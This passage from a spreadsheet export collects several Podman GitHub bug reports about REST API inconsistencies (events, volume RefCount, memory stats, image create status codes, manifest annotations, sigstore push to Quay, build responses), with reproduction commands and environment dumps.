{"status":"untag","id":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Type":"image","Action":"untag","Actor":{"ID":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Attributes":{"name":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825"}},"scope":"local","time":1661444877,"timeNano":1661444877274518985} {"status":"untag","id":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Type":"image","Action":"untag","Actor":{"ID":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Attributes":{"name":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825"}},"scope":"local","time":1661444877,"timeNano":1661444877278753809} {"status":"delete","id":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Type":"image","Action":"delete","Actor":{"ID":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Attributes":{"name":"sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825"}},"scope":"local","time":1661444877,"timeNano":1661444877436313927}  2. Now, try with podman pull httpd image  $ podman pull httpd Resolving "httpd" using unqualified-search registries (/etc/containers/registries.conf.d/999-podman-machine.conf) Trying to pull docker.io/library/httpd:latest Getting image source signatures Copying blob sha256:152876b0d24a5561415915c652dceeb3bcd5080dc24c3994e77343a81f64b9f1 Copying blob sha256:7a6db449b51b92eac5c81cdbd82917785343f1664b2be57b22337b0a40c5b29d Copying blob sha256:b4effd428409f1da4dc8c896afb9818ef1ba24be5e7e5e3d86dea650ac3ed8bc Copying blob sha256:6b29c2b62286e254216da297b4066a4bb79b918bc02811ba954bd7b8fd51360b Copying blob sha256:c2123effa3fcb96c62bf4d891147aef09029d429321bfb4c6a535fa3ca7e13d6 Copying config sha256:a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825 Writing manifest to image destination Storing signatures a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825  Track events in a separate terminal  $ curl --unix-socket /Users/benoitf/.local/share/containers/podman/machine/podman-machine-default/podman.sock http:/v1.41/events  remove the image  $ podman rmi a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825  Untagged: docker.io/library/httpd:latest Deleted: a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825 look at events  {"status":"remove","id":"a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Type":"image","Action":"remove","Actor":{"ID":"a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825","Attributes":{"containerExitCode":"0","image":"","name":"a981c8992512d65c9b450a9ecabb1cb9d35bb6b03f3640f86471032d5800d825"}},"scope":"local","time":1661444997,"timeNano":1661444997046721781,"HealthStatus":""}  we are missing the `untag` event and we receive a `remove` event instead of `delete` **Describe the results you received:** receive `remove` **Describe the results you expected:** expect `untag` + `delete` events **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  Client: Podman Engine Version: 4.2.0 API Version: 4.2.0 Go Version: go1.18.5 Built: Wed Aug 10 22:46:05 2022 OS/Arch: darwin/amd64 Server: Podman Engine Version: 4.2.0 API Version: 4.2.0 Go Version: go1.18.4 Built: Thu Aug 11 16:42:17 2022 OS/Arch: linux/amd64  **Output of `podman info`:**  (paste your output here)  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  (paste your output here)  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes/No **Additional environment details (AWS, VirtualBox, physical, etc.):**</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15720</t>
  </si>
  <si>
    <t>REST API /system/df UsageData.RefCount on volumes is always 1</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** In order to see who is using a volume, I'm using the `RefCount` attribute of `UsageData` field But even if you create a volume without using it, it returns 1. And if you create multiple containers using that volume, it's still using 1 **Steps to reproduce the issue:** 1. Create a volume without using it bash $ dummyVolume=$(podman volume create)  2. Use REST api to see refCount  $ curl --silent --unix-socket /Users/benoitf/.local/share/containers/podman/machine/podman-machine-default/podman.sock "http:/v1.41/system/df" | jq --arg volumeName $dummyVolume '.Volumes[] | select(.Name == ($volumeName))' { "Driver": "", "Labels": {}, "Mountpoint": "", "Name": "413f47a2d1656a4ec6e876543dc8a0caa5256c670a425638eff7be9730da0229", "Options": null, "Scope": "local", "UsageData": { "RefCount": 1, "Size": 0 } }  It's already invalid 3. Now, try to start containers using that volume bash $ podman run -d --mount "type=volume,src=$dummyVolume,target=/foo" docker.io/library/httpd $ podman run -d --mount "type=volume,src=$dummyVolume,target=/foo" docker.io/library/httpd  4. Rest API is still invalid bash $ curl --silent --unix-socket /Users/benoitf/.local/share/containers/podman/machine/podman-machine-default/podman.sock "http:/v1.41/system/df" | jq --arg volumeName $dummyVolume '.Volumes[] | select(.Name == ($volumeName))' { "Driver": "", "Labels": {}, "Mountpoint": "", "Name": "413f47a2d1656a4ec6e876543dc8a0caa5256c670a425638eff7be9730da0229", "Options": null, "Scope": "local", "UsageData": { "RefCount": 1, "Size": 0 } }  And we still have our container using it bash $ podman inspect 18e7216f21ab0eddb5fab99c388ba04030809b6870cd0c595e7bc84008c7fb3d | jq '.[0].Mounts' [ { "Type": "volume", "Name": "413f47a2d1656a4ec6e876543dc8a0caa5256c670a425638eff7be9730da0229", "Source": "/var/home/core/.local/share/containers/storage/volumes/413f47a2d1656a4ec6e876543dc8a0caa5256c670a425638eff7be9730da0229/_data", "Destination": "/foo", "Driver": "local", "Mode": "", "Options": [ "nosuid", "nodev", "rbind" ], "RW": true, "Propagation": "rprivate" } ]  **Describe the results you received:** RefCount = 1 **Describe the results you expected:** Valid RefCount **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  4.2.1  **Output of `podman info`:**  (paste your output here)  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  (paste your output here)  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes/No **Additional environment details (AWS, VirtualBox, physical, etc.):**</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15765</t>
  </si>
  <si>
    <t>memory Limit is returning invalid result for `/container/stats` REST API on macOS</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** The field `memory_stats.limit` is returning an invalid value **Steps to reproduce the issue:** 1. Start a dummy container like fedora bash $ MY_DUMMY_CONTAINER=$(podman run -d fedora sleep 20000)  2. Display the memory of the container from inside the container bash $ podman exec -ti $MY_DUMMY_CONTAINER cat /proc/meminfo | head -3 MemTotal: 2018452 kB MemFree: 860084 kB MemAvailable: 1556036 kB  3. Now, read the value returned by the REST API bash curl --silent --unix-socket /Users/benoitf/.local/share/containers/podman/machine/podman-machine-default/podman.sock "http:/v1.41/containers/$MY_DUMMY_CONTAINER/stats?stream=false&amp;one-shot=true" | jq .memory_stats { "usage": 94208, "max_usage": 18446744073709552000, "limit": 18446744073709552000 }  **Describe the results you received:**  "limit": 18446744073709552000  it seems this value is like the maximum value of the int/long/etc **Describe the results you expected:** something displaying around 2GB / 2Gi because it's the size of the machine.  "limit": 2066894848  and based from https://docs.docker.com/engine/api/v1.41/#tag/Container/operation/ContainerStats  used_memory = memory_stats.usage - memory_stats.stats.cache available_memory = memory_stats.limit Memory usage % = (used_memory / available_memory) * 100.0  **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  4.2.1  **Output of `podman info`:**  4.2.1  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  (paste your output here)  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes/No **Additional environment details (AWS, VirtualBox, physical, etc.):**</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15828</t>
  </si>
  <si>
    <t>Create image compat endpoint does not return 404</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** The create image compatibility endpoint does not behave the same as the docker engine endpoint or the documentation https://docs.podman.io/en/latest/_static/api.html#tag/images-(compat) When provided with an image that does not exist on the query parameter `fromImage` the endpoint returns a status code 200 instead of 404. Response body contains the expected error text. &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; **Steps to reproduce the issue:** 1. cURL the endpoint with the command ` curl -XPOST --unix-socket /var/run/docker.sock -v 'http://d/images/create?fromImage=NON_EXISTING_IMAGE' --header 'X-Registry-Auth: AUTH_TOKEN'` **Describe the results you received:** Received status code 200 OK  * Trying /var/run/docker.sock:0 * Connected to d (/run/user/podman/podman.sock) port 80 (#0) &gt; POST /images/create?fromImage=NON_EXISTING_IMAGE HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/7.83.1 &gt; Accept: */* &gt; X-Registry-Auth: AUTH_TOKEN &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.40 &lt; Libpod-Api-Version: 4.1.0 &lt; Server: Libpod/4.1.0 (linux) &lt; X-Reference-Id: 0xc000010008 &lt; Date: Wed, 14 Sep 2022 08:53:00 GMT &lt; Transfer-Encoding: chunked &lt; {"progressDetail":{},"error":"initializing source NON_EXISTING_IMAGE: reading manifest latest in IMAGE: manifest unknown: manifest unknown"} * Connection #0 to host d left intact  **Describe the results you expected:** Expected status code 404 NOT FOUND  * Trying /var/run/docker.sock:0 * Connected to d (/run/user/podman/podman.sock) port 80 (#0) &gt; POST /images/create?fromImage=NON_EXISTING_IMAGE HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/7.83.1 &gt; Accept: */* &gt; X-Registry-Auth: AUTH_TOKEN &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 404 Not Found &lt; Api-Version: 1.40 &lt; Libpod-Api-Version: 4.1.0 &lt; Server: Libpod/4.1.0 (linux) &lt; X-Reference-Id: 0xc000010008 &lt; Date: Wed, 14 Sep 2022 08:53:00 GMT &lt; Transfer-Encoding: chunked &lt; {"progressDetail":{},"error":"initializing source NON_EXISTING_IMAGE: reading manifest latest in IMAGE: manifest unknown: manifest unknown"} * Connection #0 to host d left intact  **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  Client: Podman Engine Version: 4.1.0 API Version: 4.1.0 Go Version: go1.18.5 Git Commit: c5de69cd3da571c8ebf1c03aa49d07c1e35da67c Built: Tue Aug 2 10:39:40 2022 OS/Arch: linux/amd64  **Output of `podman info`:**  host: arch: amd64 buildahVersion: 1.26.1 cgroupControllers: - cpuset - cpu - cpuacct - blkio - memory - devices - freezer - net_cls - perf_event - net_prio - hugetlb - pids - rdma cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.2-r0 path: /usr/bin/conmon version: 'conmon version 2.1.2, commit: f25214cda836296fe8695c2e582ca79d2246053a' cpuUtilization: idlePercent: 86.72 systemPercent: 4.6 userPercent: 8.68 cpus: 6 distribution: distribution: alpine version: 3.16.2 eventLogger: file hostname: image-builder-0 idMappings: gidmap: null uidmap: null kernel: 5.4.0-121-generic linkmode: dynamic logDriver: k8s-file memFree: 6932779008 memTotal: 50502590464 networkBackend: netavark ociRuntime: name: crun package: crun-1.4.5-r0 path: /usr/bin/crun version: |- crun version 1.4.5 commit: c381048530aa750495cf502ddb7181f2ded5b400 spec: 1.0.0 +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL os: linux remoteSocket: path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /etc/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-r0 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.2 swapFree: 0 swapTotal: 0 uptime: 1762h 3m 18.39s (Approximately 73.42 days) plugins: log: - k8s-file - none - passthrough network: - bridge - macvlan volume: - local registries: search: - docker.io store: configFile: /etc/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev graphRoot: /var/lib/containers/storage graphRootAllocated: 20507869184 graphRootUsed: 46239744 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /run/containers/storage volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.1.0 Built: 1659436780 BuiltTime: Tue Aug 2 10:39:40 2022 GitCommit: c5de69cd3da571c8ebf1c03aa49d07c1e35da67c GoVersion: go1.18.5 Os: linux OsArch: linux/amd64 Version: 4.1.0  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  podman-4.1.0-r3 x86_64 {podman} (Apache-2.0) [installed] podman-4.1.0-r4 x86_64 {podman} (Apache-2.0) [upgradable from: podman-4.1.0-r3]  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes **Additional environment details (AWS, VirtualBox, physical, etc.):** Running on K8S</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15952</t>
  </si>
  <si>
    <t>remote: manifest add --annotation failed to add annotations field</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; In help page, podman-remote manifest add --annotation option seems to be supported. However, --annotation option doesn't work.  # podman-remote manifest add --help Add images to a manifest list or image index &lt; snip &gt; Options: --all add all of the list's images if the image is a list --annotation annotation set an annotation for the specified image --arch architecture override the architecture of the specified image --authfile string path of the authentication file. Use REGISTRY_AUTH_FILE environment variable to override --creds [username[:password]] use [username[:password]] for accessing the registry --features features override the features of the specified image --os OS override the OS of the specified image --os-version version override the OS version of the specified image --tls-verify require HTTPS and verify certificates when accessing the registry (default true) --variant Variant override the Variant of the specified image  **Steps to reproduce the issue:**  # podman-remote manifest create test 44f340f882d25deee282e2d9abede61a030a922041d03105b02c22982f1fa8d6 # podman-remote manifest add --annotation foo=bar test quay.io/libpod/testimage:20220615 44f340f882d25deee282e2d9abede61a030a922041d03105b02c22982f1fa8d6  **Describe the results you received:**  # podman-remote manifest inspect test { "schemaVersion": 2, "mediaType": "application/vnd.docker.distribution.manifest.list.v2+json", "manifests": [ { "mediaType": "application/vnd.oci.image.manifest.v1+json", "size": 758, "digest": "sha256:a07e678985cd67330fd30a4c8a008cefeb1ca917c25ab0f8468ea17c7b34beb2", "platform": { "architecture": "amd64", "os": "linux" } } ] }  **Describe the results you expected:** 1. If --annotation option isn't supported, we need to hide --annotation option from help page. 2. If --annotation option is supported, add annotations field such as below.  # podman-remote manifest inspect test { "schemaVersion": 2, "mediaType": "application/vnd.docker.distribution.manifest.list.v2+json", "manifests": [ { "mediaType": "application/vnd.oci.image.manifest.v1+json", "size": 758, "digest": "sha256:a07e678985cd67330fd30a4c8a008cefeb1ca917c25ab0f8468ea17c7b34beb2", "platform": { "architecture": "amd64", "os": "linux" }, "annotations": { "foo": "bar" } } ] }  **Additional information you deem important (e.g. issue happens only occasionally):** Succeeded to add annotations field on local enviornment.  # podman manifest inspect test { "schemaVersion": 2, "mediaType": "application/vnd.docker.distribution.manifest.list.v2+json", "manifests": [ { "mediaType": "application/vnd.oci.image.manifest.v1+json", "size": 758, "digest": "sha256:a07e678985cd67330fd30a4c8a008cefeb1ca917c25ab0f8468ea17c7b34beb2", "platform": { "architecture": "amd64", "os": "linux" }, "annotations": { "foo": "bar" } } ] }  &lt;details&gt; &lt;summary&gt;podman-remote version&lt;/summary&gt;  Client: Podman Engine Version: 4.3.0-dev API Version: 4.3.0-dev Go Version: go1.18.3 Git Commit: 98e26278844506e64e311810f97bffcc7efc0b8a Built: Tue Sep 27 13:55:08 2022 OS/Arch: linux/amd64 Server: Podman Engine Version: 4.3.0-dev API Version: 4.3.0-dev Go Version: go1.18.3 Git Commit: 98e26278844506e64e311810f97bffcc7efc0b8a Built: Tue Sep 27 13:54:58 2022 OS/Arch: linux/amd64  &lt;/details&gt; &lt;details&gt; &lt;summary&gt;podman-remote info&lt;/summary&gt;  host: arch: amd64 buildahVersion: 1.28.0-dev cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.0-2.fc36.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.0, commit: ' cpuUtilization: idlePercent: 99.98 systemPercent: 0.01 userPercent: 0.01 cpus: 12 distribution: distribution: fedora variant: server version: "36" eventLogger: journald hostname: fedora36 idMappings: gidmap: null uidmap: null kernel: 5.18.11-200.fc36.x86_64 linkmode: dynamic logDriver: journald memFree: 6005047296 memTotal: 8326590464 networkBackend: netavark ociRuntime: name: crun package: crun-1.5-1.fc36.x86_64 path: /usr/bin/crun version: |- crun version 1.5 commit: 54ebb8ca8bf7e6ddae2eb919f5b82d1d96863dea spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: unix:run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-0.2.beta.0.fc36.x86_64 version: |- slirp4netns version 1.2.0-beta.0 commit: 477db14a24ff1a3de3a705e51ca2c4c1fe3dda64 libslirp: 4.6.1 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.3 swapFree: 8325689344 swapTotal: 8325689344 uptime: 124h 49m 14.00s (Approximately 5.17 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 106285760512 graphRootUsed: 19557855232 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 1 runRoot: /run/containers/storage volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.3.0-dev Built: 1664254498 BuiltTime: Tue Sep 27 13:54:58 2022 GitCommit: 98e26278844506e64e311810f97bffcc7efc0b8a GoVersion: go1.18.3 Os: linux OsArch: linux/amd64 Version: 4.3.0-dev  &lt;/details&gt; **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes **Additional environment details (AWS, VirtualBox, physical, etc.):** KVM, fedora36</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/16150</t>
  </si>
  <si>
    <t>Podman push image to redhat quay with sigstore was failed caused by send malformed manifest to quay</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys, When use podman 4.2.1 to push image to Redhat Quay 3.8.0, hit 500 error code, based on the log error message , seems like podman send malformed json to quay, pls review this issue and give suggestions.  [root@ip-10-0-1-76 fedora]# podman push quayregistry-quay-quay-enterprise-13240.apps.quaytest-13240.qe.azure.devcluster.openshift.com/quay/demo --tls-verify=false --sign-by-sigstore-private-key=./cosign.key Key Passphrase: Getting image source signatures Copying blob 288cf3a46e32 done Copying blob 75ba02937496 done Copying blob 0c7daf9a72c8 done Copying blob 955c9335e041 done Copying blob 8e079fee2186 done Copying blob 186da837555d done Copying blob d172a9e6f9e6 done Copying blob cf399be408ea done Copying blob 793b971ccb99 done Copying config da84e66c3a done Writing manifest to image destination Signing manifest using a sigstore signature Storing signatures Error: writing signatures: uploading manifest sha256-2353c13421e07e3d3dd1bb181cf0b7ad5e6dce3e1bb363c33f48d12e0a0ada49.sig to quayregistry-quay-quay-enterprise-13240.apps.quaytest-13240.qe.azure.devcluster.openshift.com/quay/demo: received unexpected HTTP status: 500 Internal Server Error   gunicorn-registry stdout | 2022-10-11 03:58:52,461 [214] [ERROR] [gunicorn.error] Error handling request /v2/quay/demo/manifests/sha256-2353c13421e07e3d3dd1bb181cf0b7ad5e6dce3e1bb363c33f48d12e0a0ada49.sig gunicorn-registry stdout | Traceback (most recent call last): gunicorn-registry stdout | File "/quay-registry/image/oci/config.py", line 209, in __init__ gunicorn-registry stdout | validate_schema(self._parsed, OCIConfig.METASCHEMA) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/jsonschema/validators.py", line 934, in validate gunicorn-registry stdout | raise error gunicorn-registry stdout | jsonschema.exceptions.ValidationError: '' is not one of ['layers'] gunicorn-registry stdout | Failed validating 'enum' in schema['properties']['rootfs']['properties']['type']: gunicorn-registry stdout | {'description': 'MUST be set to layers.', gunicorn-registry stdout | 'enum': ['layers'], gunicorn-registry stdout | 'type': 'string'} gunicorn-registry stdout | On instance['rootfs']['type']: gunicorn-registry stdout | '' gunicorn-registry stdout | During handling of the above exception, another exception occurred: gunicorn-registry stdout | Traceback (most recent call last): gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/gunicorn/workers/base_async.py", line 55, in handle gunicorn-registry stdout | self.handle_request(listener_name, req, client, addr) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/gunicorn/workers/ggevent.py", line 127, in handle_request gunicorn-registry stdout | super().handle_request(listener_name, req, sock, addr) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/gunicorn/workers/base_async.py", line 108, in handle_request gunicorn-registry stdout | respiter = self.wsgi(environ, resp.start_response) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/app.py", line 2463, in __call__ gunicorn-registry stdout | return self.wsgi_app(environ, start_response) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/werkzeug/middleware/proxy_fix.py", line 169, in __call__ gunicorn-registry stdout | return self.app(environ, start_response) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/app.py", line 2449, in wsgi_app gunicorn-registry stdout | response = self.handle_exception(e) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/app.py", line 1866, in handle_exception gunicorn-registry stdout | reraise(exc_type, exc_value, tb) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/_compat.py", line 39, in reraise gunicorn-registry stdout | raise value gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/app.py", line 2446, in wsgi_app gunicorn-registry stdout | response = self.full_dispatch_request() gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/app.py", line 1951, in full_dispatch_request gunicorn-registry stdout | rv = self.handle_user_exception(e) gunicorn-registry stdout | File "/usr/local/lib/python3.9/site-packages/flask/app.py", line 1820, in handle_user_exceptiongunicorn-registry stdout | 'x-ms-copy-source': 'REDACTED' </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/16360</t>
  </si>
  <si>
    <t>Podman socket: Build API produces different results then Docker's Build API</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; As i am migrating from OL7 -&gt; OL8 (RHEL based), i am wanting to keep my current code working - for that i am relying on podman socket to keep my docker-compose / docker py usage functional. Docker-compose seems fine but docker-py is not, there is an issue where the return values from the build API is different: https://github.com/containers/podman/blob/40e8bcb8482f2a1f60b93524ceda05770d20739e/pkg/api/handlers/compat/images_build.go#L803 The final response includes 2 lines rather than a single line, as this `aux` object is added. This isn't really an issue and i can workaround it, but was wondering if it would be changed to be in line with docker API. **Steps to reproduce the issue:** 1. Use docker py to build an image with docker and podman socket 2. See that the final response from the api is different **Describe the results you received:** {"aux":{"ID":"sha256:2d49cc4bc02bb457a9459736c461c52944e68e2a40cf2bb1207494b2b72c5f82"}}\n{"stream":"Successfully built 2d49cc4bc02b\\n"}\n **Describe the results you expected:** {"stream":"Successfully built 2d49cc4bc02b\\n"}\n **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  Client: Podman Engine Version: 4.1.1 API Version: 4.1.1 Go Version: go1.17.12 Built: Wed Oct 26 15:12:06 2022 OS/Arch: linux/amd64  **Output of `podman info`:**  host: arch: amd64 buildahVersion: 1.26.2 cgroupControllers: [] cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.3-1.module+el8.6.0+20857+bf01bdf2.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.3, commit: 0e2e290c54cc97af44a8b96f004ff81e8abd8956' cpuUtilization: idlePercent: 98.48 systemPercent: 0.21 userPercent: 1.31 cpus: 104 distribution: distribution: '"ol"' variant: server version: "8.6" eventLogger: file hostname: cicd-bm-standard-ol8 idMappings: gidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 165536 size: 65536 uidmap: - container_id: 0 host_id: 1001 size: 1 - container_id: 1 host_id: 165536 size: 65536 kernel: 5.4.17-2136.310.7.1.el8uek.x86_64 linkmode: dynamic logDriver: k8s-file memFree: 630402412544 memTotal: 809608286208 networkBackend: cni ociRuntime: name: runc package: runc-1.1.3-2.module+el8.6.0+20857+bf01bdf2.x86_64 path: /usr/bin/runc version: |- runc version 1.1.3 spec: 1.0.2-dev 